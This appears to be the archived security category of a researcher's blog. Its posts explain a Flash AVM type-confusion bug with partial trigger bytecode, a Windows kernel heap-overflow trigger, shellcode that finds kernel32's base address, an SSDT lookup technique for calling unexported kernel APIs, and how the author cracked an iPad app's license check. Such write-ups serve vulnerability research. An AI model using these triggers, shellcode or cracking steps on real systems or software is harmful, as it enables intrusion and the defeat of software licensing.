Archive for the ‘Security’ Category

Flash News

Tuesday, November 13th, 2018

TLDR; There’s a bug in Adobe Flash.
The interpreter code of the Action Script Virtual Machine (AVM)
does not reset a with-scope pointer when an exception is caught,
leading later to a type confusion bug, and eventually to a remote code execution.

First, we will start with general information on how the Flash engine, AVM, works,
because I find it fascinating and important for understanding the matter at hand.

Flash runs code by either JITting it or by interpreting it. The design of the engine is to verify the ActionScript3 (AS in short) code and the meta data only once upon loading a (SWF) file and then to run the code while trusting it (without re-validation). This improves significantly the performance of running Flash applications. This affects instructions, they are also designed to have operands as part of their (fixed) byte code. For example, the pushstring instruction will take an index number into the strings array that is defined in the SWF file and it can only point to a valid entry in that array (if it won’t, the verifier component will reject this file from being run). Later, in the JITted code or interpreter, it will assume that the verifier already confirmed this instruction with its operand and just load the requested entry and push it to the stack, as opposed to reading the entry from a register, which can be dynamically set in runtime and thus require a runtime check.
The AS code also supports a stack and registers, and since it is a dynamic language that lets one define members and properties (key/value pairs) on the fly, the engine will have to search for them every time, and to coerce their types too to the expected types; of a function argument for example. This coercion is done all over the place and is the heart of making sure types are safe all over their use. The coercion will even go further and change a type to another expected type automatically to be valid for that function call.

When the AVM runs code, the relevant part in the verifier is doing its important job by following and analyzing statically all instructions by simulating them and it verifies the types of all registers, variables on the stack and more, in order to see how they are about to be used, and if it sees they are used as invalid/wrong types, it will fail loading the file in advance. Otherwise it will just let the operation continue normally with assuming the type is correct and expected. Imagine there’s a function prototype that receives an integer argument:
function foo(bar:int):void {}
but you pass a string to it instead:
foo("imahacker")
then the verifier won’t like it and will fail this code from running. In other times, if you pass an object which has a default-value method, it might invoke it in run time to hopefully get an integer, but it will make sure in runtime that it really got an integer… so some of the checks also happen in runtime when it can’t know in static time (so yes, it’s okay to pass object as an integer).

Another trait of AS is what make properties dynamic, or technically how they are searched for every time. Starting with local scope and going to higher scopes in the hierarchy up to the globals’ scope. This is all documented. It hurts to know that much searching is done in order to find the right property in the scope chain every time code accessed it.
Perhaps Flash gives full OOP abilities on top of a dynamic language but when we take a look at the open source code of the AVM, it’s really horrifying, code dups all over instead of encapsulation, or the same part of the SWF will be parsed in multiple places and each time different functionality will be applied to it and other horrors…that we, security researchers, love.

Anyway, Flash will prefer to use the JIT as much as possible to run actual code, because it’s faster. It will emit real code of the target hosting architecture while doing the same pass for verifying the code. And it can even JIT a function while it’s already running inside the interpreter and continue from that state, impressive. However, remember that the interpreter is always used to run constructors of a user class defined in the SWF. And this is how we make sure our code will get to run inside the vulnerable interpreter. The engine can also handle exceptions on its own (try-catch and throw), employing setbuf and jmpbuf, so if an exception is raised inside an AS function, the interpreter implementation or the JIT infrastructure itself will catch it and pass it along the
next handler in the chain until a correct AS catch-handler with the right type will be found and execution will resume inside the interpreter, in our case, from that spot of the catch handler.
Basically, if you try to make an infinite call-recursion to itself, you won’t see a native (Windows/Linux) exception thrown, but rather the interpreter checks the size of its own stack artificially in some spots and will emulate its own stack overflow/underflow exceptions. If you will try to do an integer division by zero, then they already handle it themselves in the div instruction handler, etc. It’s pretty much robust and a closed system. There are many other interesting Flash internals topics, like atoms, the garbage collector, JIT, etc, but that won’t be covered today.

Now that you have some idea of how the AVM works.
Let’s talk business.
In AS you can use the keyword “with” to be lazy and omit the name of the instance whose members you want to access.
That’s normal in many scripting languages, but I will show it nevertheless.
For example, instead of doing:
point.x = 0x90;
point.y = 0xc3;
point.z = 0xcd;
It can be written as following using the “with” keyword:
with (point)
{
 x = 0x90;
 y = 0xc3;
 z = 0xcd;
}
For each assignment the interpreter will first use the with-scope if it’s set to avoid searching the full chain, once it got the property it will make the assignment itself. So, there’s an actual function that looks up the property in the scopes array of a given function. The origin of the bug occurs once an exception is thrown in the code, the catch handler infrastructure inside the interpreter will NOT reset its with-scope variable, so actually it will keep looking for properties in that with-scope in the next times. But (a big BUTT) the verifier, while simulating the exception catching,
will reset its own state for the with-scope. And this, ladies and gentlemen, leads to a discrepancy between the verifier and the interpreter. Thus, opens a type confusion attack. Pow pow pow. In other words, we managed to make the interpreter do one thing, while the verifier thinks it does another (legit) thing.

This is how we do it:
In the beginning we load the with-scope with a legit object. We later raise a dummy exception and immediately catch it ourselves. Now, the interpreter will still use the with-object we loaded, although the verifier thinks we don’t use a with-scope anymore, we will query for a member with a certain controlled type from the with-scope again and now use it as an argument for a function or an operand for an instruction that expects something else, and voila we got a type confusion. Remember, the verifier will think we use a different property that matches the expected type we want to forge and thus won’t fail loading our file.

Let’s see the bug in the interpreter code first, and then an example on how to trigger it.
At line 796, you can see:
register Atom* volatile withBase = NULL;

That’s the local variable of the interpreter function that we’re messing up with (pun intended)! Note that technically the withBase is used as a pointer-offset to the scopeBase array
(that’s all the scopes that the function loaded on its scopes stack), but that doesn’t change the logic or nature of the bug, just how we tailor the bits and bytes to trigger the bug, if you are interested to understand this confusing description, you will have to read findproperty implementation. And at line 2347 which is the handler of the findproperty instruction:
*(++sp) = env->findproperty(scope, scopeBase, scopeDepth, multiname, b1, withBase);

See they pass the withBase to the findproperty, that’s the one to look up a property in the scope chain. This is where we will make it return a different property,
while the verifier will think it returned a valid typed property from our object. Now, we can use throw keyword to raise an exception, and the catch handler infrastructure at line 3540, will handle it.
CATCH (Exception *exception)

You can see that it will reset many variables of its own state machine, and set the interpreter’s PC (program counter, or next instruction’s address) to start with the target handler’s address, etc.
But they forgot to reset the withBase. I bet they didn’t forget, and they did it for performance sake, their code has tons of micro and obsessive optimizations, that today a good engineer wouldn’t just do. You can also note that they clear scopeBase array only in debugger mode (line 3573), and that used to be another bug, until they realized they better do it always.
They used to have many bugs around the scope arrays in the interpreter, but they’re all fixed now in the binaries, since we look at an old source code you can still find them.

Finally, let’s see how we would maneuver this altogether.
I used the great rabcdasm tool to assemble this.
This code is partial and only the relevant guts of the triggering exploit.

; All functions start with some default scope, we keep it too.
getlocal0
pushscope

; We create a property with the name "myvar" that is really an object itself of type NewClass2.
; This property which is inside the object/dictionary will be the one the verifier sees.
getlocal0
findpropstrict QName(PackageNamespace(""), "NewClass2")
constructprop QName(PackageNamespace(""), "NewClass2"), 0
initproperty QName(PackageInternalNs(""), "myvar")

; We push a second item on the scope array,
; to make the withBase point to its location in the scopes array.
; Note this array contains both normal scope objects and with scope objects.
getlocal0
pushwith

; Now we throw an exception, just to make the interpreter keeping a stale withBase.
L10:
pushbyte 1
throw
L12:
nop
L16:
; This is our catch handler, we continue to do our thing.
; Now note that the withBase points to the second item on the scopes array,
; which currently won't be used until we put something there (because the scopes array is empty).

; Put back the first scope on the scope stack, so we can work normally.
getlocal0
pushscope

; Now we're going to create an object which has one property of an integer type and its name is "myvar".
; This property will be returned instead of the correct one from the object we created above.
pushstring "myvar"
; Next is the attacking type to be really used instead!!!1@ :)
; This is the actual value that will be fetched by getproperty instruction below.
pushint 534568
; Create an object with 1 property (name, value pair on the stack)
newobject 1
; Mark it as an object type.
coerce QName(PackageNamespace(""), "Object")

; And now push it to the scope, note we don't use pushwith this time!
; Because we want to keep old value, otherwise verifier will be on to us,
; This makes our object that we just created as the new with-scope object.
pushscope

; Now, findproperty et al will actually scan for our property using the withBase in practice,
; which has our fake object that we recently created,
; containing a property with the "myvar" name, with a different type from what the verifier sees
; (Remember - it sees the object above, in the beginning of this function).
findproperty Multiname("myvar", [PackageInternalNs(""), PackageNamespace("")])
getproperty Multiname("myvar", [PackageInternalNs(""), PackageNamespace("")])

; Now practically on the stack we have an integer,
; instead of an object, and next executing getslot which assumes an object (NewClass2) is in the stack,
; will crash miserably!
getslot 1

returnvoid

The triggering code can be done with many different variations. Instructions like nextvlaue can be targeted too, because it doesn’t verify its operands in runtime and can leak pointers etc.
When I found this bug at first, I thought there’s small chance it’s a real bug. Particularly, I had my doubts, because the chances to have a forgotten/dangling with-scope is high in a normal Flash application. So how come nobody encountered this bug before as a misbehavior of their app? E.G. by getting a wrong variable, etc. Apparently, the combination to cause this scenario accurately is not that high after all.

Good bye Flash, you’ve been kind…

Exploiting Android Stagefright with ASLR Bypass

Friday, March 4th, 2016

Everybody knows that exploiting remote code execution vulnerabilities is a real challenge. Rumors say it that some entities around the world managed to do it but AFAIK, nobody published anything, as they might use it for gathering intelligence. Israeli NorthBit security consultancy company researched the vulnerability and managed to bypass the ASLR through exploiting the bug using a browser on Android 5.0 and 5.1 for Samsung devices.

For more details see http://tinyurl.com/h4deqjg

Kernel Exploits

Monday, November 21st, 2011

Hey

I’m uploading a presentation of a good friend, Gilad Bakas, who has just spoken in Ruxcon in Australia.

Get it now: Kernel Exploits

Enjoy

isX64 Gem

Wednesday, July 13th, 2011

I needed a multi-arch shellcode for both x86 and x64 in the same code. Suppose you want to attack a platform, which can either be x86 or x64 where you don’t know in advance which it is. The problem is which version you really need to use at runtime then, right?

This is a tiny trick I’ve been using for a long while now which tells whether you run on x64 or not:

XOR EAX, EAX
INC EAX ; = DB 0x40
NOP
JZ x64_code
x86_code:
bits 32
.
.
.
RET
x64_code:
bits 64
.
.

The idea is very simple, since x64 and x86 share most opcodes’ values, there is a small in-similarity with the range of 0x40-0x50, in x86 it used for one byte INC and DEC opcodes. Since there’re 8 GPRs (General Purpose Register), and 2 opcodes, it spans over the whole range of 0x40-0x50.
Now when AMD64’s ISA (Instruction Set Architecture) was designed, they added another set of 8 GPRs, making it a total of whopping 16 GPRs. In a world where x86 ruled, you only needed 3 bits in the ModRM byte (some byte in the instruction that tells the processor how to read its operands) to access a specific register from 0 to 8. With the new ISA, an extra bit was required in order to be able to address all 16 registers. Therefore, a new prefix (called the REX prefix) was added to solve this problem with an extra bit (and there’s more to it, not relevant for now). The new prefix used the range of 0x40-0x50, thus eliminating old one byte INC/DEC (no worries however, now compilers use the 2 bytes existent variation for these instructions).

Back to our assembly code, it depends on the fact that in x86 the INC EAX, really increments EAX by one, and so it will become 1 if the code runs on x86. And when it’s run on x64, it becomes a prefix to the NOP instruction, which doesn’t do anything anyway. And hence, EAX stays zero. Just a final note for the inexperienced that in x64, operations on 32 bit registers are automatically promoted to 64 bit registers, so RAX is also 0.

Finding Kernel32 Base Address Shellcode

Thursday, July 7th, 2011

Yet another one…
This time, smaller, more correct, and still null-free.
I looked a bit at some shellcodes at exploit-db and googled too, to see whether anyone got a smaller way to no avail.

I based my code on:
http://skypher.com/index.php/2009/07/22/shellcode-finding-kernel32-in-windows-7/
AFAIK, who based his post on:
http://blog.harmonysecurity.com/2009_06_01_archive.html

And this is my version:

00000000 (02) 6a30                     PUSH 0x30
00000002 (01) 5e                       POP ESI
; Use DB 0x64; LODSD
00000003 (02) 64ad                     LODS EAX, [FS:ESI]
00000005 (03) 8b700c                   MOV ESI, [EAX+0xc]
00000008 (03) 8b761c                   MOV ESI, [ESI+0x1c]
0000000b (03) 8b5608                   MOV EDX, [ESI+0x8]
0000000e (04) 807e1c18                 CMP BYTE [ESI+0x1c], 0x18
00000012 (02) 8b36                     MOV ESI, [ESI]
00000014 (02) 75f5                     JNZ 0xb

The tricky part was how to read from FS:0x30, and the way I use is the smallest one, at least from what I checked.
Another issue that was fixed is the check for kernel32.dll, usually the variation of this shellcode checks for a null byte, but it turned out to be bogous on W2k machines, so it was changed to check for a null word. Getting the shellcode by a byte or two longer.

This way, it’s only 22 bytes, it doesn’t assume that kernel32.dll is the second/third entry in the list, it actually loops till it finds the correct module length (len of ‘kernel32.dll’ * 2 bytes). Also since kernelbase.dll can come first and that renders lots of implementations of this technique unusable.
And obviously the resulting base address of kernel32.dll is in EDX.

Enjoy

[Update July 9th:]
Here’s a link to an explanation about PEB/LDR lists.
See first comment for a better version which is only 17 bytes.

Calling System Service APIs in Kernel

Wednesday, January 26th, 2011

In this post I am not going to shed any new light about this topic, but I didn’t find anything like this organized in one place, so I decided to write it down, hope you will find it useful.

Sometimes when you develop a kernel driver you need to use some internal API that cannot be accessed normally through the DDK. Though you may say “but it’s not an API if it’s not officially exported and supported by MS”. Well that’s kinda true, the point is that some functions like that which are not accessible from the kernel, are really accessible from usermode, hence they are called API. After all, if you can call NtCreateFile from usermode, eventually you’re supposed to be able to do that from kernel, cause it really happens in kernel, right? Obviously, NtCreateFile is an official API in the kernel too.

When I mean using system service APIs, I really mean by doing it platform/version independent, so it will work on all versions of Windows. Except when MS changes the interface (number of parameters for instance, or their type) to the services themselves, but that rarely happens.

I am not going to explain how the architecture of the SSDT and the transitions from user to kernel or how syscalls, etc work. Just how to use it to our advantage. It is clear that MS doesn’t want you to use some of its APIs in the kernel. But sometimes it’s unavoidable, and using undocumented API is fine with me, even in production(!) if you know how to do it well and as robust as possible, but that’s another story. We know that MS doesn’t want you to use some of these APIs because a) they just don’t export it in kernel on purpose, that is. b) starting with 64 bits versions of Windows they made it harder on purpose to use or manipulate the kernel, by removing previously exported symbols from kernel, we will get to that later on.

Specifically I needed ZwProtectVirtualMemory, because I wanted to change the protection of some page in the user address space. And that function isn’t exported by the DDK, bummer. Now remember that it is accessible to usermode (as VirtualProtectMemory through kernel32.dll syscall…), therefore there ought to be a way to get it (the address of the function in kernel) in a reliable manner inside a kernel mode driver in order to use it too. And this is what I’m going to talk about in this post. I’m going to assume that you already run code in the kernel and that you are a legitimate driver because it’s really going to help us with some exported symbols, not talking about shellcodes here, although shellcodes can use this technique by changing it a bit.

We have a few major tasks in order to achieve our goal: Map the usermode equivalent .dll file. We need to get the index number of the service we want to call. Then we need to get the base address of ntos and the address of the (service) table of pointers (the SSDT itself) to the functions in the kernel. And voila…

The first one is easy both in 32 and 64 bits systems. There are mainly 3 files which make the syscalls in usermode, such as: ntdll, kernel32 and user32 (for GDI calls). For each API you want to call in kernel, you have to know its prototype and in which file you will find it (MSDN supplies some of this or just Google it). The idea is to map the file to the address space as an (executable) image. Note that the cool thing about this mapping is that you will get the address of the required file in usermode. Remember that these files are physically shared among all processes after boot time (For instance, addresses might change because of ASLR but stay consistent as long as the machine is up). Following that we will use a similar functionality to GetProcAddress, but one that you have to write yourself in kernel, which is really easy for PE and PE+ (64 bits).

Alright, so we got the image mapped, we can now get some usermode API function’s address using our GetProcAddress, now what? Well, now we have to get the index number of the syscall we want. Before I continue, this is the right place to say that I’ve seen so many approaches to this problem, disassemblers, binary patterns matching, etc. And I decided to come up with something really simple and maybe new. You take two functions that you know for sure that are going to be inside kernel32.dll (for instance), say, CreateFile and CloseHandle. And then simply compare byte after byte from both functions to find the first different byte, that byte contains the index number of the syscall (or the low byte out of the 4 bytes integer really). Probably you have no idea what I’m talking about, let me show you some usermode API’s that directly do syscalls:

XP SP3 ntdll.dll
B8 25 00 00 00                    mov     eax, 25h        ; NtCreateFile
BA 00 03 FE 7F                    mov     edx, 7FFE0300h
FF 12                             call    dword ptr [edx]
C2 2C 00                          retn    2Ch

B8 19 00 00 00                    mov     eax, 19h        ; NtClose
BA 00 03 FE 7F                    mov     edx, 7FFE0300h
FF 12                             call    dword ptr [edx]
C2 04 00                          retn    4

Vista SP1 32 bits ntdll.dll

B8 3C 00 00 00                    mov     eax, 3Ch        ; NtCreateFile
BA 00 03 FE 7F                    mov     edx, 7FFE0300h
FF 12                             call    dword ptr [edx]
C2 2C 00                          retn    2Ch

B8 30 00 00 00                    mov     eax, 30h        ; NtClose
BA 00 03 FE 7F                    mov     edx, 7FFE0300h
FF 12                             call    dword ptr [edx]
C2 04 00                          retn    4

Vista SP2 64 bits ntdll.dll

4C 8B D1                          mov     r10, rcx        ; NtCreateFile
B8 52 00 00 00                    mov     eax, 52h
0F 05                             syscall
C3                                retn

4C 8B D1                          mov     r10, rcx        ; NtClose
B8 0C 00 00 00                    mov     eax, 0Ch
0F 05                             syscall
C3                                retn

2008 sp2 64 bits ntdll.dll

4C 8B D1                          mov     r10, rcx        ; NtCreateFile
B8 52 00 00 00                    mov     eax, 52h
0F 05                             syscall
C3                                retn

4C 8B D1                          mov     r10, rcx        ; NtClose
B8 0C 00 00 00                    mov     eax, 0Ch
0F 05                             syscall
C3                                retn

Win7 64bits syswow64 ntdll.dll

B8 52 00 00 00                    mov     eax, 52h        ; NtCreateFile
33 C9                             xor     ecx, ecx
8D 54 24 04                       lea     edx, [esp+arg_0]
64 FF 15 C0 00 00+                call    large dword ptr fs:0C0h
83 C4 04                          add     esp, 4
C2 2C 00                          retn    2Ch

B8 0C 00 00 00                    mov     eax, 0Ch        ; NtClose
33 C9                             xor     ecx, ecx
8D 54 24 04                       lea     edx, [esp+arg_0]
64 FF 15 C0 00 00+                call    large dword ptr fs:0C0h
83 C4 04                          add     esp, 4
C2 04 00                          retn    4

These are a few snippets to show you how the syscall function templates look like. They are generated automatically by some tool MS wrote and they don’t change a lot as you can see from the various architectures I gathered here. Anyway, if you take a look at the bytes block of each function, you will see that you can easily spot the correct place where you can read the index of the syscall we are going to use. That’s why doing a diff on two functions from the same .dll would work well and reliably. Needless to say that we are going to use the index number we get with the table inside the kernel in order to get the corresponding function in the kernel.

This technique gives us the index number of the syscall of any exported function in any one of the .dlls mentioned above. This is valid both for 32 and 64 bits. And by the way, notice that the operand type (=immediate) that represents the index number is always a 4 bytes integer (dword) in the ‘mov’ instruction, just makes life easier.

To the next task, in order to find the base address of the service table or what is known as the system service descriptor table (in short SSDT), we will have to get the base address of the ntoskrnl.exe image first. There might be different kernel image loaded in the system (with or without PAE, uni-processor or multi-processor), but it doesn’t matter in the following technique I’m going to use, because it’s based on memory and not files… This task is really easy when you are a driver, means that if you want some exported symbol from the kernel that the DDK supplies – the PE loader will get it for you. So it means we get, without any work, the address of any function like NtClose or NtCreateFile, etc. Both are inside ntos, obviously. Starting with that address we will round down the address to the nearest page and scan downwards to find an ‘MZ’ signature, which will mark the base address of the whole image in memory. If you’re afraid from false positives using this technique you’re welcome to go further and check for a ‘PE’ signature, or use other techniques.

This should do the trick:

PVOID FindNtoskrnlBase(PVOID Addr)
{
    /// Scandown from a given symbol's address.
    Addr = (PVOID)((ULONG_PTR)Addr & ~0xfff);
    __try {
        while ((*(PUSHORT)Addr != IMAGE_DOS_SIGNATURE)) {
            Addr = (PVOID) ((ULONG_PTR)Addr - PAGE_SIZE);
        }
        return Addr;
    }
    __except(1) { }
    return NULL;
}

And you can call it with a parameter like FindNtoskrnlBase(ZwClose). This is what I meant that you know the address of ZwClose or any other symbol in the image which will give you some “anchor”.

After we got the base address of ntos, we need to retrieve the address of the service table in kernel. That can be done using the same GetProcAddress we used earlier on the mapped user mode .dll files. But this time we will be looking for the “KeServiceDescriptorTable” exported symbol.

So far you can see that we got anchors (what I call for a reliable way to get an address of anything in memory) and we are good to go, this will work in production without the need to worry. If you wanna start the flame war about the unlegitimate use of undocumented APIs, etc. I’m clearly not interested. :)
Anyway, in Windows 32 bits, the latter symbol is exported, but it is not exported in 64 bits! This is part of the PatchGuard system, to make life harder for rootkits, 3rd party drivers doing exactly what I’m talking about, etc. I’m not going to cover how to get that address in 64 bits in this post.

The KeServiceDescriptorTable is a table that holds a few pointers to other service tables which contain the real addresses of the service functions the OS supplies to usermode. So a simple dereference to the table and you get the pointer to the first table which is the one you are looking for. Using that pointer, which is really the base address of the pointers table, you use the index we read earlier from the required function and you got, at last, the pointer to that function in kernel, which you can now use.

The bottom line is that now you can use any API that is given to usermode also in kernelmode and you’re not limited to a specific Windows version, nor updates, etc. and you can do it in a reliable manner which is the most important thing. Also we didn’t require any special algorithms nor disassemblers (as much as I like diStorm…). Doing so in shellcodes make life a bit harder, because we had the assumption that we got some reliable way to find the ntos base address. But every kid around the block knows it’s easy to do it anyway.

Happy coding :)

References I found interesting about this topic:
http://j00ru.vexillium.org/?p=222
http://alter.org.ua/docs/nt_kernel/procaddr/

http://uninformed.org/index.cgi?v=3&a=4&p=5

And how to do it in 64 bits:

http://www.gamedeception.net/threads/20349-X64-Syscall-Index

New Project – ReviveR

Saturday, September 25th, 2010

Hey all,

long time haven’t posted. I’m kinda busy with lots of stuff.
Anyway I just wanted to let you know that I’m starting to work on the sequel of diStorm, you guessed it right… A reversing studio!
Unlike what many people said, the core is going to be written in C++, the GUI is going to be written per OS. No thanks, QT. Top goals are performance, scripting, good UI and most important good analysis capabilities. Obviously it’s going to be open source, cross platform. For a start, it will support only x86 and AMD64 and PE file format, maybe ELF too, though not my priority. I’m not sure about a debugger yet, but it will probably be implemented later. GUI is going to be written using WPF under C#, just to give you an idea.

My main interests are performance and binary code analysis algorithms.

If there are highly skilled programmers who wish to help, please contact me.
For now it seems we are a group of 4 coders, I’m still not going to publish their names, until everything is settled.

Anyway, design is taking place nowadays. This is your time for suggesting new features and ideas.

Big good luck

diStorm3 is Ready

Monday, August 16th, 2010

diStorm3 is ready for the masses! :)
– if you want to maximize the information you get from a single instruction; Structure output rather than text, flow control analysis support and more!

Check it out now at its new google page.

Good luck!

Heapos Forever

Friday, August 6th, 2010

There are still hippos around us, beware:
heapo

Kernel heap overflow.

DEVMODE dm = {0};
dm.dmSize  = sizeof(DEVMODE);
dm.dmBitsPerPel = 8;
dm.dmPelsWidth = 800;
dm.dmPelsHeight = 600;
dm.dmFields = DM_PELSWIDTH | DM_PELSHEIGHT | DM_BITSPERPEL;
ChangeDisplaySettings(&dm, 0);

BITMAPINFOHEADER bmih = {0};
bmih.biClrUsed = 0x200;

HGLOBAL h = GlobalAlloc(GMEM_FIXED, 0x1000);
memcpy((PVOID)GlobalLock(h), &bmih, sizeof(bmih));
GlobalUnlock(h);

OpenClipboard(NULL);
SetClipboardData(CF_DIBV5, (HANDLE)h);
CloseClipboard();

OpenClipboard(NULL);
GetClipboardData(CF_PALETTE);


[Update, 11th Aug]: Here is MSRC response.

Cracking for Fun and Non-Profit

Saturday, May 22nd, 2010

One of the fun things to do with applications is to bypass their copy-protection mechanisms. So I want to share my experience about some iPad application, though the application is targeted for the Jailbroken devices. It all began a few days ago, when a friend was challenging me to crack some application. I had my motives, and I’m not going to talk about them. However, that’s why the title says non-profit. Or maybe when they always say “for profit” they mean the technical-knowledge profit.

So before you start to crack some application, what you should do is see how it works, what happens when you run it, what GUI related stuff you can see, like dialog boxes or messages that popup, upon some event you fire. There are so many techniques to approach application-cracking, but I’m not here to write a tutorial, just to talk a bit about what I did.

So I fired IDA with the app loaded, the app was quite small, around 35kb. First thing I was doing was to see the imported functions. This is how I know what I’m going to fight with in one glare. I saw MD5/RSA imported from the crypto library, and that was like “oh uh”, but no drama. Thing is, my friend purchased the app and gave me the license file. Obviously it’s easier with a license file, otherwise, sometimes it’s proved that it’s impossible to crack software without critical info that is encrypted in the license file, that was the issue in my case too. Of course, there’s no point in a license file that only checks the serial-number or something like that, because it’s not enough. So without the license file, there wasn’t much to do.

For some reason IDA didn’t like to parse the app well, so I had to recall how to use this ugly API of IDC (the internal scripting language of IDA), yes, I know IDA Python, but didn’t want to use it. So my script was fixing all LDR instructions, cause the code is PICy so with the strings revealed I could easily follow all those ugly objc_msgSend calls. For Apple’s credit, the messages are text based, so it’s easy to understand what’s going on, once you manage to get to that string. For performance’s sake, this is so lame, I rather use integers than strings, com’on.

Luckily the developer of that app didn’t bother to hide the exported list of functions, he was busy with pure protection algorithm in Objective-C, good for me.
So eventually the way the app worked (license perspective) was to check if the license file exists, if so, parse it. Otherwise, ask for a permission to connect to the Internet and send the UDID (unique device ID) of the device to the app’s server, get a response, and if the status code was success, write it to a file, then run the license validator again.

The license validator was quite cool, it was calling dladdr on itself to get the full path of the executable itself, then calculating the MD5 of the binary. Can you see why? So if you thought you could easily tamper with the file, you were wrong. Taking the MD5 hash, and xoring it in some pattern with the data from the license file; Then decrypting the result with the public key that was in the static segment, though I didn’t care much about it. Since the MD5 of the binary itself was used, this dependency is a very clever trick of the developer, though expected. So I tried to learn more about how the protection works.

Suppose the license was legit, the app would take that buffer and strtok() it to tokens, to check that the UDID was correct. The developer was nice enough to call the lockdownd APIs directly, so in one second I knew where and what was going on around it. In the beginning I wanted to create a proxy dylib for this lockdownd library, but it would require me to patch the header of the mach-o so the imported function will be through my new file – but it still requires a change to the file, no good. So the way it worked with the decrypted string – it kept on tokenizing the string, but this time, it checked for some string match, as if someone tampered with the binary, the decryption would go wrong and the string wouldn’t compare well. And then it did some manipulation on some object, adding methods to it in runtime, with the names from the tokenized string, thus if you don’t have a license file to begin with, you don’t know the names of the new methods that were added. One star for the developer, yipi.

All in all, I have to say that I wasn’t using any debugger or runtime tricks, everything was static reversing, yikes. Therefore, after I was convinced that I can’t ignore the protection because I lack of the names of the new methods, and I can’t use a debugger to phish the names easily. I was left with one solution, as I said before – faking the UDID and fixing the MD5.

What I really cared about for a start, was how the app calculates the MD5 of itself:
Since the developer retrieved the name of the binary using dladdr, I couldn’t just change some path to point to the original copy of the binary, so when it hashes it, it would get the expected hash. That was a bammer, I had to do something else, but similar idea… I decided to patch the file-open function. The library functions are called in ARM mode and it’s very clear. The app itself was in THUMB, so it transitions to ARM using a BX instruction and calls a thunk, that in order will call the imported function. So the thunk function is in ARM mode, thus 4 bytes per instruction, very wasteful IMHO.

The goal of my patches was to patch those thunks, rather than all the callers to those thunks. Cause I could end up with a dozen of different places to patch. So I was limited in the patches I could do in a way. So eventually I extended the thunk of the file-open and made R0 register point to my controlled path, where I could guarantee an original copy of the binary, so when it calculated the MD5 of it, it would be the expected hash. Again, I could do so many other things, like planting a new MD5 value in the binary and copy it in the MD5-Final API call, but that required too much code changes. And oh yes, I’m such a jackass that I didn’t even use an Arm-assembler. Pfft, hex-editing FTW :( Oh also, I have to comment that it was safe to patch the thunk of file-open, cause all the callers were related to the MD5 hashing…

Ok, so now I got the MD5 good and I could patch the file however I saw fit. Patching the UDID-strcmp’s wasn’t enough, since the license wasn’t a “yes/no” check, it had essential data I needed, otherwise I could finish with the protection in 1 minute patch (without going to the MD5 hassle). So I didn’t even touch those strcmp’s.

RSA encryption then? Ahhh not so fast, the developer was decrypting the xored license with the resulted MD5 hash, then comparing the UDID, so I got the license decrypted well with the MD5 patch, but now the UDID that was returned from the lockdownd was wrong, wrong because it wasn’t corresponding to the purchased license. So I had to change it as well. The problem with that UDID and the lockdownd API, is that it returns a CFSTR, so I had to wrap it with that annoying structure. That done, I patched the thunk of the lockdown API to simply return my CFSTR of the needed UDID string.

And guess what?? it crashed :) I put my extra code in a __ustring segment, in the beginning I thought the segment wasn’t executable, because it’s a data. But I tried to run something very basic that would work for sure, and it did, so I understood the problem was with my patch. So I had to double check it. Then I found out that I was piggy-backing on the wrong (existing) CFSTR, because I changed its type. Probably some code that was using the patched CFSTR was expecting a different type and therefore crashed, so I piggy-backed a different CFSTR that wouldn’t harm the application and was a similar type to what I needed (Just a string, 0x7c8). What don’t we do when we don’t have segment slacks for our patch code. :)

And then it worked… how surprising, NOT. But it required lots of trial and errors, mind you, because lack of tools mostly.
End of story.
It’s really hard to say how I would design it better, when I had my chance, I was crazy about obfuscation, to make the reverser desperate, so he can’t see a single API call, no strings, nothing. Plant decoy strings, code, functionality, so he wastes more time. Since it’s always possible to bypass the protections, if the CPU can do it, I can do it too, right? (as long as I’m on the same ring).